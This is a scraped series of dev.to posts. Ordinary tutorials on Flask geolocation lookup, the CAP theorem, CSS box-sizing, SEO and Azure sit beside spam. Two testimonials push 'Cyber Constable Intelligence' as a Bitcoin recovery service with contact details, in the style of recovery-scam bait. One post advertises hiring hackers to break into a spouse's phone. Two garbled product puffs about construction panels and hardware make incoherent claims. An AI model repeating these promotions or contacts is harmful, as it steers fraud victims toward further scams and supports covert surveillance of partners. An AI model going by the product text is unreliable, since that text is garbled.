2024-07-05T02:44:33
https://dev.to/ip2location/how-to-use-ip2locationio-and-ip2whois-in-flask-59lk
webdev, programming, python, developers
## Introduction Flask is a Python micro web framework that does not rely on any particular tool or library to work. Because of it’s simplicity and lightweight nature, many websites had adapted Flask into their backend, such as Pinterest and LinkedIn. Flask allows developers to use any third party extensions to add more functionality. For example, developers can utilize a geolocation lookup extension to lookup for the geolocation information of their visitor. In this article, we will show you how to use IP2Location.io and IP2WHOIS API to perform geolocation and domain WHOIS lookup in Flask. ## Prerequisite Before we start, you will be required to install the following components into your server. - IP2Location.io Python SDK To perform geolocation lookup, you need to install it using this command: `pip install ip2location-io`. - IP2WHOIS Python SDK To perform domain WHOIS lookup, you need to install it using this command: `pip install IP2WHOIS`. You will also need a IP2Location.io API key to perform any type of lookup. You can sign up for a [free API key](https://www.ip2location.io/sign-up#devto), or [purchase a plan](https://www.ip2location.io/pricing#devto) according to your need. ## Steps **Step 1:** In your local server, create a new directory called _mywebsite_, and navigate to the directory. **Step 2:** Create a new file called _app.py_, and paste the following code into the file: ``` from flask import Flask, render_template, jsonify, request import ip2locationio import ip2whois app = Flask(__name__) @app.route('/geolocation-lookup') def geolocation_lookup(): if request.environ.get('HTTP_X_FORWARDED_FOR') is None: ip = request.environ['REMOTE_ADDR'] else: ip = request.environ['HTTP_X_FORWARDED_FOR'] if ip == '127.0.0.1': # Happened in Windows, if the IP got is 127.0.0.1, need to substitute with real IP address ip = '8.8.8.8' # Google Public IP # Configures IP2Location.io API key configuration = ip2locationio.Configuration('YOUR_API_KEY') ipgeolocation = ip2locationio.IPGeolocation(configuration) rec = ipgeolocation.lookup(ip) return render_template('display_ip2locationio_result.html', data=rec) @app.route('/whois-lookup') def index(): domain = "locaproxy.com" # We will use a fixed value for domain name in this tutorial, but you can always change it to accept input from a form or url. # Configures IP2WHOIS API key ip2whois_init = ip2whois.Api('YOUR_API_KEY') # Lookup domain information results = ip2whois_init.lookup(domain) return render_template('display_ip2whois_result.html', data=results) if __name__ == '__main__': app.run(debug=True) ``` **Step 3:** Create a new sub directory called templates. Then, in the templates folder, create two new html files called _display_ip2locationio_result.html_ and _display_ip2whois_result.html_. 
Paste the following contents into both files respectively: ``` <!-- display_ip2locationio_result.html --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>IP Information</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } table, th, td { border: 1px solid #ccc; } th, td { padding: 10px; text-align: left; } th { background-color: #f4f4f4; } </style> </head> <body> <h1>IP Information for {{ data.ip }}</h1> <table> <tr> <th>Field</th> <th>Value</th> </tr> <tr> <td>IP</td> <td>{{ data.ip }}</td> </tr> <tr> <td>Country Code</td> <td>{{ data.country_code }}</td> </tr> <tr> <td>Country Name</td> <td>{{ data.country_name }}</td> </tr> <tr> <td>Region Name</td> <td>{{ data.region_name }}</td> </tr> <tr> <td>City Name</td> <td>{{ data.city_name }}</td> </tr> <tr> <td>Latitude</td> <td>{{ data.latitude }}</td> </tr> <tr> <td>Longitude</td> <td>{{ data.longitude }}</td> </tr> <tr> <td>Zip Code</td> <td>{{ data.zip_code }}</td> </tr> <tr> <td>Time Zone</td> <td>{{ data.time_zone }}</td> </tr> <tr> <td>ASN</td> <td>{{ data.asn }}</td> </tr> <tr> <td>AS</td> <td>{{ data.as }}</td> </tr> <tr> <td>Is Proxy</td> <td>{{ data.is_proxy }}</td> </tr> </table> </body> </html> ``` ``` <!-- display_ip2whois_result.html --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain Information</title> <style> body { font-family: Arial, sans-serif; margin: 20px; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } table, th, td { border: 1px solid #ccc; } th, td { padding: 10px; text-align: left; } th { background-color: #f4f4f4; } </style> </head> <body> <h1>Domain Information for {{ data.domain }}</h1> <table> <tr> <th>Field</th> <th>Value</th> </tr> <tr> <td>Domain</td> <td>{{ data.domain }}</td> </tr> <tr> <td>Domain ID</td> <td>{{ data.domain_id }}</td> </tr> <tr> <td>Status</td> <td>{{ data.status }}</td> </tr> <tr> <td>Create Date</td> <td>{{ data.create_date }}</td> </tr> <tr> <td>Update Date</td> <td>{{ data.update_date }}</td> </tr> <tr> <td>Expire Date</td> <td>{{ data.expire_date }}</td> </tr> <tr> <td>Domain Age</td> <td>{{ data.domain_age }} days</td> </tr> <tr> <td>Whois Server</td> <td>{{ data.whois_server }}</td> </tr> <tr> <td>Registrar</td> <td> Name: {{ data.registrar.name }}<br> URL: <a href="{{ data.registrar.url }}" target="_blank">{{ data.registrar.url }}</a><br> IANA ID: {{ data.registrar.iana_id }} </td> </tr> <tr> <td>Registrant</td> <td> Name: {{ data.registrant.name }}<br> Organization: {{ data.registrant.organization }}<br> Address: {{ data.registrant.street_address }}, {{ data.registrant.city }}, {{ data.registrant.region }} {{ data.registrant.zip_code }}, {{ data.registrant.country }}<br> Phone: {{ data.registrant.phone }}<br> Fax: {{ data.registrant.fax }}<br> Email: {{ data.registrant.email }} </td> </tr> <tr> <td>Admin</td> <td> Name: {{ data.admin.name }}<br> Organization: {{ data.admin.organization }}<br> Address: {{ data.admin.street_address }}, {{ data.admin.city }}, {{ data.admin.region }} {{ data.admin.zip_code }}, {{ data.admin.country }}<br> Phone: {{ data.admin.phone }}<br> Fax: {{ data.admin.fax }}<br> Email: {{ data.admin.email }} </td> </tr> <tr> <td>Tech</td> <td> Name: {{ data.tech.name }}<br> Organization: {{ data.tech.organization }}<br> Address: {{ data.tech.street_address }}, {{ 
data.tech.city }}, {{ data.tech.region }} {{ data.tech.zip_code }}, {{ data.tech.country }}<br> Phone: {{ data.tech.phone }}<br> Fax: {{ data.tech.fax }}<br> Email: {{ data.tech.email }} </td> </tr> <tr> <td>Billing</td> <td> Name: {{ data.billing.name }}<br> Organization: {{ data.billing.organization }}<br> Address: {{ data.billing.street_address }}, {{ data.billing.city }}, {{ data.billing.region }} {{ data.billing.zip_code }}, {{ data.billing.country }}<br> Phone: {{ data.billing.phone }}<br> Fax: {{ data.billing.fax }}<br> Email: {{ data.billing.email }} </td> </tr> <tr> <td>Nameservers</td> <td> <ul> {% for nameserver in data.nameservers %} <li>{{ nameserver }}</li> {% endfor %} </ul> </td> </tr> </table> </body> </html> ``` **Step 4:** In your terminal, navigate to the project directory, and run the following command to start the local server: `flask run`. Take note that if you named the _app.py_ to other name such as _website.py_, the command will become `flask --app website run` instead. **Step 5:** Now you can go to your browser, and navigate to the link http://127.0.0.1:5000/geolocation-lookup and http://127.0.0.1:5000/whois-lookup to see the results. You will see similar outputs displayed in the screenshot below. ![IP address information](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/382f0xzu1zyvk87kes2m.png) ![Domain information](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/en17144ae8g6uq7eoof1.png) --- For more tutorials, please visit [IP2Location IP Gelocation](https://blog.ip2location.com/#devto) Where can I find [free IP Geolocation API](https://www.ip2location.io/#devto)? Where can I get [free IP Geolocation database](https://lite.ip2location.com/#devto)?
ip2location
1,912,157
My 3 years using CAP Theorem in 5 minutes
A simple and popular mention of the CAP Theorem in office work is: It’s not possible to have...
0
2024-07-05T02:48:47
https://dev.to/prestonp/my-3-years-using-cap-theorem-in-5-minutes-1ojn
captheorem, softwareengineering, softwaredevelopment, systemdesignconcepts
--- title: My 3 years using CAP Theorem in 5 minutes published: true date: 2024-07-05 02:44:00 UTC tags: captheorem,softwareengineering,softwaredevelopment,systemdesignconcepts canonical_url: --- ![A colorful painting of a mango tree wearing a cap, in the style of 1800s, pixel art](https://cdn-images-1.medium.com/max/1024/1*UfftpmFmqMaiGZ-YpuDLOg.png) A simple and popular mention of the CAP Theorem in office work is: > It’s not possible to have Consistency, Availability, and Partition tolerance at the same time. There are many other variants. I’m sure most engineers have heard at least one. The more complex but rarely mentioned explanation of the CAP Theorem would be from its original author, in this keynote from July 2000: [Brewer PODC Keynote](https://sites.cs.ucsb.edu/~rich/class/cs293b-cloud/papers/Brewer_podc_keynote_2000.pdf). The most complex and almost never discussed is CAP’s proof. For example, this nicely written paper: [Brewer’s Conjecture And The Feasibility of Consistent, Available, Partition-Tolerance Web Services](https://users.ece.cmu.edu/~adrian/731-sp04/readings/GL-cap.pdf). I think the Simple CAP is not suitable to convey its meaning accurately, at least not enough for software development work, especially when decisions need to be made. **💡 Dangerously, decisions that require mentioning CAP are often important ones.** On the other hand, the Complex CAP is too long and too technical. There are many details requiring an understanding of distributed system theory. In most cases outside research, we don’t actually need those. Needless to say, it is rarely used in offices. I seek something in the middle for my own use and came up with what I call “Sweet CAP.” It is not a single sentence, but four. Here they are: > _C in CAP is strong consistency._ > _With many servers, P is always needed so we simply choose C or A._ > _A is preferred in most cases not involving money, together with eventual consistency._ > _Simplicity first, you may not need to worry about CAP at a small scale._ Certainly, saying all four at the same time is weird. I choose to use each sentence when necessary. For example: > Jerry: Because of CAP, our service needs to shut down when we are doing this operation to maintain consistency. > Me: Wait a second, we only need to shut down if we need strong consistency. Is it this case? I have used these in my work over the last three years in chats, talks, and design documents. My colleagues seem to be okay with it. Most don’t have a problem understanding the message I want to convey. Sometimes, it even ignites more enjoyable discussions. That’s why it is Sweet CAP. * * *
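For readers who would rather see the strong-versus-eventual consistency trade-off than just read about it, here is a toy, single-process Python sketch (purely illustrative, not from the keynote or the proof above): one replica takes the write immediately, the other only catches up after a simulated replication delay, so a read served by it stays stale for a moment.

```python
# Toy illustration of eventual consistency with two in-memory "replicas".
import threading
import time


class Replica:
    def __init__(self, name):
        self.name = name
        self.data = {}

    def read(self, key):
        return self.data.get(key)


primary = Replica("primary")
secondary = Replica("secondary")


def write(key, value, replication_delay=0.5):
    """Write to the primary right away; replicate to the secondary later."""
    primary.data[key] = value

    def replicate():
        time.sleep(replication_delay)  # simulated network lag / partition
        secondary.data[key] = value

    threading.Thread(target=replicate, daemon=True).start()


write("balance", 100)
print("primary read:   ", primary.read("balance"))    # 100 immediately
print("secondary read: ", secondary.read("balance"))  # None -> stale answer (choosing A)
time.sleep(1)
print("secondary later:", secondary.read("balance"))  # 100 once replication catches up
```

A strongly consistent system would make the stale read wait or fail instead of answering, which is exactly the availability you give up when you pick C.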
prestonp
1,912,152
The Benefits of Polyurethane Sandwich Panels in Building Projects
The structure of polyurethane sandwich panel is a special type in the category of panels used for...
0
2024-07-05T02:38:51
https://dev.to/harold_rmessiersyr_756b/the-benefits-of-polyurethane-sandwich-panels-in-building-projects-bc1
design
The polyurethane sandwich panel is a special type in the category of panels used for building projects. These panels have three layers: a middle filling core, a top surface, and a bottom layer. The central core is polyurethane foam, which also helps stabilize temperature, so the panel can be installed in a wide range of constructions. The top and bottom layers are made of rigid galvanized steel, which increases the panels' strength.

Thanks to this structural composition, polyurethane sandwich panels come with numerous benefits. They are lightweight, which makes them easy to install, and they can be customized according to your project's needs. These Polyurethane sandwich Panel products come in different sizes and can be tailored to a particular building requirement. They also have an environmental upside: they are made from recycled materials and do not emit harmful substances during production or use.

Safety and innovation are two defining features of polyurethane sandwich panels. These panels comply with all applicable laws and regulations, so the ChronoSpeed model offers maximum protection. Furthermore, the polyurethane core material is fire retardant and has been shown by the National Fire Protection Association (NFPA) to maintain its integrity in an emergency. The sheets also resist water and rust, making them well suited to severe weather and offering protection against other external hazards.

Polyurethane sandwich panels are easy to install and use in real applications. The first step in a project is to define exactly what size and thickness the panels need to be if they are going to perform as intended. This is followed by choosing the right top and bottom layers for both logistics and design. These Foam sandwich Panel pieces are then cut to exact sizes and seamed together with proprietary tools.

Polyurethane sandwich panels are synonymous with premium service and versatility. They provide a durable, cost-competitive solution that withstands severe weather and resists fire and pests. In addition, they are low maintenance and easy to install, making them a strong choice for large building projects. Applications for polyurethane sandwich panels are widespread, ranging from large industrial projects such as warehouses and factories to ordinary residential and office buildings, including cold storage facilities. They are most common in environments that need temperature control, such as refrigeration units and laboratories, thanks to their excellent thermal insulation properties.

To sum up, polyurethane sandwich panels are an intelligent and cost-effective choice for almost all building projects, small or large. Their many Rock Wool Sandwich Panel advantages, such as thermal efficiency, strength, and versatility, also make them well suited to construction. These panels emphasize safety, sustainability, and ease of installation, making them an ideal choice for elaborate building projects. Take a page out of this book and power up your next construction project with polyurethane sandwich panels!
harold_rmessiersyr_756b
1,912,144
HIRING THE BEST BITCOIN RECOVERY EXPERT FROM CYBER CONSTABLE INTELLIGENCE
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email...
0
2024-07-05T02:31:50
https://dev.to/caylon_sands_3b65bbe6d3c7/hiring-the-best-bitcoin-recovery-expert-from-cyber-constable-intelligence-bgh
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email info: (support(@)cyberconstableintelligence).  com) Just a mere month ago, I found myself teetering on the precipice of financial disaster, all thanks to an ill-fated decision to invest my hard-earned £5000 with a crypto investment company I stumbled upon on Telegram. The promises were grandiose, the returns seemingly too good to be true. And, as it turned out, they were indeed too good to be true. The individual behind the screen painted a mesmerizing picture of success, luring me in with the allure of high returns and quick profits. Naive and hopeful, I took the plunge, depositing my savings into their platform with dreams of financial freedom dancing in my mind. However, the dream quickly soured into a nightmare when I attempted to withdraw my initial investment. Despite seeing the purported amount displayed tantalizingly on the dashboard, access to my funds was inexplicably barred. Panic set in as I realized I had fallen victim to a meticulously crafted scam. The realization hit me like a freight train. I was on the brink of bankruptcy, my hard-earned money seemingly evaporating into thin air. Feelings of helplessness and despair engulfed me as I grappled with the harsh reality of my situation. Just when I was about to succumb to despair, a ray of hope pierced through the darkness in the form of an article I stumbled upon on Medium. It spoke of a company by the name of Cyber Constable Intelligence, claiming to specialize in recovering funds lost to online scams. Skeptical yet desperate, I decided to reach out to them, clinging to the sliver of hope they offered. To my astonishment and immense relief, Cyber Constable Intelligence lived up to its lofty reputation. With unparalleled expertise and professionalism, they swiftly embarked on the arduous task of retrieving my lost funds. Within a mere week, they had succeeded where I had thought all hope was lost—they helped me recover my £5000. Words cannot express the overwhelming sense of gratitude and relief I felt upon receiving my reclaimed funds. Cyber Constable Intelligence not only salvaged me from the jaws of financial ruin but restored my faith in humanity. Their unwavering dedication and commitment to their clients are a testament to their integrity and reliability. This has taught me invaluable lessons that I will carry with me for a lifetime. I have learned to exercise caution and discernment in my financial endeavors, to tread carefully, and to scrutinize every opportunity that presents itself. No longer will I be swayed by the false promises of strangers peddling dreams of easy wealth. Instead, I vow to approach investments with meticulous care, consulting with financial experts and conducting thorough due diligence before parting ways with my hard-earned money. I understand now, more than ever, the importance of investing only what I can afford to lose and staying vigilant against the ever-looming specter of online scams. To anyone who finds themselves teetering on the edge of financial ruin or falling victim to the siren song of fraudulent schemes, I implore you—do not lose hope. There are reputable recovery services like Cyber Constable Intelligence out there, ready and willing to lend a helping hand in your worst hour. I urge all who read this to heed my cautionary tale and approach investments with the utmost care and diligence. Stay safe, stay informed, and may your financial endeavors be guided by wisdom and prudence.
caylon_sands_3b65bbe6d3c7
1,912,143
Why and How to Use Box-Sizing: 'Border-Box' in Your CSS Layouts
When working with CSS, one of the most crucial yet often misunderstood properties is box-sizing. This...
0
2024-07-05T02:28:59
https://dev.to/cindykandie/why-and-how-to-use-box-sizing-border-box-in-your-css-layouts-30ei
css, tailwindcss, frontend
When working with CSS, one of the most crucial yet often misunderstood properties is `box-sizing`. This property plays a significant role in how elements are sized and can make the difference between a layout that behaves as expected and one that doesn't. In this article, we'll dive deep into the `box-sizing` property, understand its variations, and explore why it is essential for creating consistent and predictable layouts. #### What is `box-sizing`? The `box-sizing` property allows us to control how the width and height of an element are calculated. By default, CSS uses the `content-box` value for `box-sizing`, which means the width and height you set for an element only include the content area, excluding padding and border. However, this default behaviour can often lead to unexpected results, especially when adding padding and borders. #### Variations of `box-sizing` There are two primary values for the `box-sizing` property: 1. `content-box` (default): The width and height properties include only the content. Padding and border are added outside of the content area, increasing the total size of the element unexpectedly. 2. `border-box`: The width and height properties include the content, padding, and border. This means the total size of the element is constrained to the specified width and height, regardless of padding or border. Let's explore how these variations work with some practical examples. #### Example: `content-box` vs. `border-box` Consider the following HTML and CSS: ```html <div class="content-box">Content Box</div> <div class="border-box">Border Box</div> ``` ```css div { width: 200px; height: 100px; padding: 20px; border: 10px solid #333; margin: 10px; } .content-box { box-sizing: content-box; /* the default */ background-color: lightblue; } .border-box { box-sizing: border-box; background-color: lightcoral; } ``` #### Results ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r21dsz6uiehnj2bf949p.png) When using `content-box`, the actual rendered size of the `.content-box` element is: * Width: 200px (content) + 40px (padding) + 20px (border) = 260px * Height: 100px (content) + 40px (padding) + 20px (border) = 160px In contrast, when using `border-box`, the `.border-box` element's total size remains exactly 200px by 100px because the padding and border are included in the specified dimensions. #### Why is `box-sizing` Important? 1. **Predictable Layouts**: By using `box-sizing: border-box`, you ensure that the dimensions you set are the dimensions you get. This predictability is crucial when creating complex layouts, especially in responsive design where elements must fit perfectly within their containers. 2. **Simplified Calculations**: With `border-box`, you don't have to calculate and adjust for padding and border manually, simplifying the process of setting element sizes. 3. **Consistency Across Elements**: Applying `box-sizing: border-box` globally ensures a consistent box model throughout your project, reducing the chances of layout inconsistencies and bugs. #### Practical Example: Global `box-sizing` A common best practice is to apply `box-sizing: border-box` to all elements using a universal selector: ```css *, *::before, *::after { box-sizing: border-box; } ``` This rule ensures that all elements, including pseudo-elements, adhere to the `border-box` model, providing a solid foundation for your layouts, as the small layout sketch below illustrates.
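To see the "predictable layouts" point in action, here is a small sketch of my own (the `.row`/`.col` class names and the 400px width are illustrative, not part of the original demo). With the default `content-box`, two 50%-wide columns that also carry padding and a border add up to more than 100% of the row, so the second column wraps; with the global `border-box` rule above, the same markup stays on one line because padding and border are absorbed into the declared 50%.

```html
<div class="row">
  <div class="col">Left</div>
  <div class="col">Right</div>
</div>
```

```css
/* With border-box, each .col is exactly 50% of the row, padding and
   border included, so the two columns sit side by side. Under the
   default content-box the same rules total more than 100% and the
   second column drops onto the next line. */
*,
*::before,
*::after {
  box-sizing: border-box;
}

.row {
  width: 400px;
}

.col {
  float: left; /* float keeps the demo minimal; flexbox works too */
  width: 50%;
  padding: 10px;
  border: 2px solid #333;
}
```

Switching `.col` back to `box-sizing: content-box` in the browser dev tools is an easy way to watch the overflow reappear.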
#### Maintaining Dimensions with Borders Consider the following example where we have a simple circle without any `box-sizing` applied: ```html <body> <div class='a'></div> </body> <style> body { background: pink; display: flex; align-items: center; justify-content: center; } .a { background: black; height: 100px; width: 100px; border-radius: 100%; } </style> ``` **Result:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bysn91u0ydq72e94vi5j.png) Here, no `box-sizing` is needed because there is no border or padding to affect its 100px width and height. Now, let's say you want to add a border to the circle while still maintaining its dimensions: ```html <body> <div class='a'></div> </body> <style> body { background: pink; display: flex; align-items: center; justify-content: center; } .a { background: black; height: 100px; width: 100px; border-radius: 100%; border: 30px solid purple; } </style> ``` **Result:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0sml163cznjfyb827ei0.png) Simply adding the border increases the width and height by 60px each (a 30px border on each side). To maintain the original dimensions, you could reduce the width and height by 60px, but using `box-sizing: border-box` allows you to avoid manual calculations: ```html <body> <div class='a'></div> </body> <style> body { background: pink; display: flex; align-items: center; justify-content: center; } .a { background: black; height: 100px; width: 100px; border-radius: 100%; border: 30px solid purple; box-sizing: border-box; /* simply add this */ } </style> ``` **Result:** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mbyiyu0m0jlw7a1kwo0m.png) Adding the `box-sizing: border-box` property helps you maintain the circle's dimensions while achieving your design goals. #### Creative Uses of `box-sizing` Beyond maintaining consistent layouts, `box-sizing` can be creatively used to achieve specific design effects. For example, when creating a button with equal padding inside, using `border-box` ensures that adding borders or increasing padding does not affect the overall size of the button, preserving the design integrity. ```css button { padding: 10px 20px; border: 2px solid #000; background-color: #f0f0f0; box-sizing: border-box; } ``` Here, the button's size remains consistent, regardless of any changes to padding or border, making it easier to maintain uniformity across different buttons. #### Conclusion Understanding and effectively using the `box-sizing` property is vital for any CSS developer aiming to create reliable and maintainable layouts. By adopting `box-sizing: border-box`, you can simplify your CSS, avoid common pitfalls, and ensure that your designs are consistent across different elements and screen sizes. Embrace the power of `box-sizing` to keep your layouts in perfect order and elevate your CSS skills to the next level. See you on the next one!
cindykandie
1,912,142
MOST RELIABLE BITCOIN RECOVERY EXPERT// CYBER CONSTABLE INTELLIGENCE
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE...
0
2024-07-05T02:27:36
https://dev.to/mary_pruett_85f86d0ad836d/most-reliable-bitcoin-recovery-expert-cyber-constable-intelligence-1h9a
webdev, javascript, programming, beginners
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE INTELLIGENCE emerges as a guiding force, offering solace and support to those who fall by the intricate web of online scams and frauds. Their name carries weight, synonymous with reliability and resilience in the face of adversityThe recounted tale of financial ruin serves as a poignant reminder of the pervasive threats that loom in the virtual realm. Amidst the chaos, CYBER CONSTABLE INTELLIGENCE stands tall, a beacon of support for those navigating the murky waters of cybercrime. Theirs is a mission defined by unwavering dedication and unwavering resolve, a testament to their commitment to safeguarding the interests of their clients. What distinguishes CYBER CONSTABLE INTELLIGENCE is its unwavering commitment to transparency and accountability. Rooted in a foundation of trust, they approach each case with meticulous care and attention to detail. Theirs is a journey guided by integrity, where the pursuit of justice takes precedence above all else. In the case under scrutiny, CYBER CONSTABLE INTELLIGENCE response was nothing short of remarkable. Armed with a wealth of knowledge and expertise in cybercrime intervention, they embarked on a journey to reclaim what was rightfully theirs. Theirs was a mission defined by precision and determination, a testament to their unwavering commitment to their client's well-being. The road to recovery was fraught with challenges, yet CYBER CONSTABLE INTELLIGENCE navigated it with poise and resilience. Through careful investigation and strategic intervention, they successfully reclaimed every penny of the staggering 10.06 BTC unlawfully seized from the victim. Their triumph was not merely financial but symbolic, a testament to the indomitable spirit of those who refuse to be cowed by adversity. But CYBER CONSTABLE INTELLIGENCE impact extends far beyond mere restitution. By empowering individuals to reclaim their autonomy and security in the digital realm, they sow the seeds of resilience and fortitude. Their unwavering dedication to their client's well-being serves as a beacon of hope in an otherwise uncertain world. This testimonial stands as a testament to the efficacy of CYBER CONSTABLE INTELLIGENCE services. It is a testament to their integrity and unwavering commitment to justice. In a world rife with uncertainty, they stand as a bastion of stability, offering a lifeline to those in need. As we traverse the ever-evolving landscape of cyberspace, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, ready to confront the challenges that lie ahead. Their expertise in cybercrime intervention is unparalleled, providing individuals with the reassurance that they are not alone in their fight against online fraudsters. CYBER CONSTABLE INTELLIGENCE is not just a service provider; they are experts for those who have been victimized by online scams and fraud. With their unwavering commitment to justice and integrity, they offer a glimmer of hope amidst the chaos of the digital world. As we continue to navigate the complexities of the digital age, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, guiding us toward a safer and more secure prospect. Clink on the link below: WhatsApp info: +1 (252) 378-7611 Website info: https://cyberconstableintelligence. com Email info: support@cyberconstableintelligence. com
mary_pruett_85f86d0ad836d
1,912,132
Fundamental Parts of a Successful SEO Plan in Digital Marketing
In today's competitive world of digital marketing, a winning SEO strategy isn't just about getting...
0
2024-07-05T02:10:58
https://dev.to/juddiy/fundamental-parts-of-a-successful-seo-plan-in-digital-marketing-24ol
seo, marketing, learning
In today's competitive world of digital marketing, a winning SEO strategy isn't just about getting high rankings and lots of traffic. It's about reaching the right audience and driving real business results. So, what are the key ingredients for creating a successful SEO strategy? 1. **In-depth Keyword Research**: Understanding the search terms used by your target audience is crucial. Utilize tools like [SEO AI](https://seoai.run/) to identify high-traffic and relevant keywords. SEO AI excels in advanced algorithmic analysis and AI support, helping optimize keyword selection and webpage content structure. 2. **Creating High-Quality Content**: Search engines increasingly prioritize content quality and relevance. Providing valuable and engaging content not only attracts and retains readers but also enhances rankings in search engines. 3. **On-Page SEO**: Ensure that webpage structure, tags, meta descriptions, and titles are optimized. These elements not only influence how search engines understand your pages but also directly impact user click-through rates and experience. 4. **Mobile-Friendliness**: With the proliferation of mobile devices, ensuring your website performs well on mobile is crucial. Responsive design and fast loading speeds are essential. 5. **Technical SEO**: Optimizing technical aspects such as page loading speed, code structure, and security (e.g., SSL certificates) improves search engine crawler efficiency and enhances user experience. 6. **Off-Page SEO**: Building high-quality backlinks significantly boosts website authority and rankings. Collaborating with authoritative websites in your industry to publish content or implementing PR strategies can effectively build backlinks. 7. **User Experience (UX)**: Good user experience includes fast page loading times, easy navigation, effective content layout, and accurate answers to user queries. 8. **Regular Analysis and Adjustment**: Use tools like Google Analytics to continually monitor website performance and user behavior. Adjust your SEO strategy promptly to adapt to evolving market trends and search engine algorithms. A successful SEO strategy is a comprehensive and multi-faceted process. By focusing on these key elements, businesses can achieve significant success in digital marketing, attract more potential customers, and stand out in a competitive market.
juddiy
1,912,141
Bluekin Hardware: Your One-Stop Shop for Nails, Wire, and Wire Mesh
Bluekin Hardware:Your Best Source of Nails, Wire and wire mesh Are you a wood or metal crafter at...
0
2024-07-05T02:24:23
https://dev.to/harold_rmessiersyr_756b/bluekin-hardware-your-one-stop-shop-for-nails-wire-and-wire-mesh-2o6o
design
Bluekin Hardware:Your Best Source of Nails, Wire and wire mesh Are you a wood or metal crafter at heart? If that is so, then you know how important finding the right products are to making your projects a reality. Well, search no more because here at Bluekin Hardware we have a wide variety of nails and wires & wire steel mesh products for every or any project you got in mind. Here are some reasons that will compel you to opt for Bluekin Hardware as your |Leading Store. Benefits of Bluekin Hardware The moment you walk into Bluekin Hardware, quality is something that just enough for your needs! Your Satisfaction is our Victory - A true saying that describes our Hotel very thoroughly, as we never allow you to leave unsatisfied. Our well-developed and tested hotel reservation system helps you around every single feature of automating your online business.cljs:45-31 Additionally, we offer competitive pricing for you to stay within budget and get the materials that you need. Innovation, and ensuring safety Bluekin Hardware is all about innovation and safety most of anything. That commitment manifests in our catalogue of products, that are all as safe to use as they can be and that we consider carefully tailored (literally) specifically towards you. We will continue to search and test new chemicals with our dedicated team, ensuring you the best from on-the-market. Nails, Wire And Mesh Can Be Used In Any Number Of Projects Nails, wire and hardware cloth are the unsung heroes of so many projects. From building a robust wooden fence, to creating one of your very own metal art pieces or perhaps just needing to secure two materials together; we have the right reinforced mesh product for youlikelihood. Product Usage Instructions Taking your way through the product classes of Bluekin Hardware is simple. Just choose the right way for your project and follow them. If you have any questions, or need help our expert team is always available to hep and assist Unparalleled Customer Service For the good of our customers, Bluekin Hardware is committed to running a clean business every day. From choosing the right product for your needs to learning how to use our materials effectively, you can count on us. I assure you that you are in good hands. We Curate the Right Quality for Every Project Regardless of the size or complexity level of your project, you can rely on Bluekin Hardware to deliver stainless steel wire mesh products that meet exactly what you are looking for. We have laid out a large selection of nails, wire and woven wire mesh to supply the many various jobs. With experience in everything from large construction projects to small home repairs, we have the skill set needed. That is it for Bluekin Hardware: the best source of nails, wire and wire mesh. Stay confident that when you turn to us, we will be ready with the materials it takes to get your projects done right because at Ampm Open House our commitment is clear: You can trust in quality products and cutting-edge solutions from a team who truly cares. Whether you are a professional tradesman in the industry or an enthusiastic DIYer, we have endeavoured to deliver our products to empower your path on success. Choose right visit us at Bluekin Hardware to EXPERIENCE the AMAZING DIFFERENCE!!!
harold_rmessiersyr_756b
1,912,140
WEB BAILIFF CONTRACTORS LEGIT PHONE HACKER
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school...
0
2024-07-05T02:23:00
https://dev.to/philip_grisly_ecd2f26ea7b/web-bailiff-contractors-legit-phone-hacker-58hj
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school lover even though we have 2 little children. I hopped on the internet to look for a phone hacker so that I could confirm my fears when I came across Web Bailiff Contractors who have hundreds of reviews as legit phone hackers. I gave them her info and they got back to me in about 4 hours. You can just search them on Google and head on to their website where you can communicate via the chat feature or the contact details displayed.
philip_grisly_ecd2f26ea7b
1,912,139
Export any Web Page to Markdown
TLDR; Here’s the chrome extension link. If you search for same solution on internet, everyone will...
0
2024-07-05T02:22:15
https://dev.to/amit_kharel_aae65abe2b111/export-any-web-page-to-markdown-23f
markdown
> TLDR; Here's the Chrome extension [link](https://chromewebstore.google.com/detail/export-to-markdown/dodkihcbgpjblncjahodbnlgkkflliim). If you search for the same solution on the internet, most guides will push you to install unwanted Node modules and libraries that don't work in the end. Here's a simple solution: ### Solution: - Open the Chrome Web Store through this [link](https://chromewebstore.google.com/detail/export-to-markdown/dodkihcbgpjblncjahodbnlgkkflliim). ![Chrome Web Store](https://cdn-images-1.medium.com/max/2286/1*mXXLjcY22LcoVx2Zo3nflA.png) - Click the **Add to Chrome** button. - That's it! Now just visit the web page you want to export, go to the list of extensions and click on **"Export to Markdown"**. ![Export to Markdown](https://cdn-images-1.medium.com/max/2338/1*whBkK_XwxyKcKTr86RThlg.png) - You'll get a preview of the Markdown as shown below. Just click **copy to clipboard** and paste it into a file. ![](https://cdn-images-1.medium.com/max/2338/1*0oIQZxvazmTBKyS36r8-iQ.png)
amit_kharel_aae65abe2b111
1,912,138
How to Create Virtual Machine Scale Set.
Login to Azure Create a Virtual Machine Scale Set Clean Up Resource This article steps through...
0
2024-07-05T02:20:16
https://dev.to/emeka_moses_c752f2bdde061/how-to-create-virtual-machine-scale-set-1l0m
azure, balancer, vmss, load
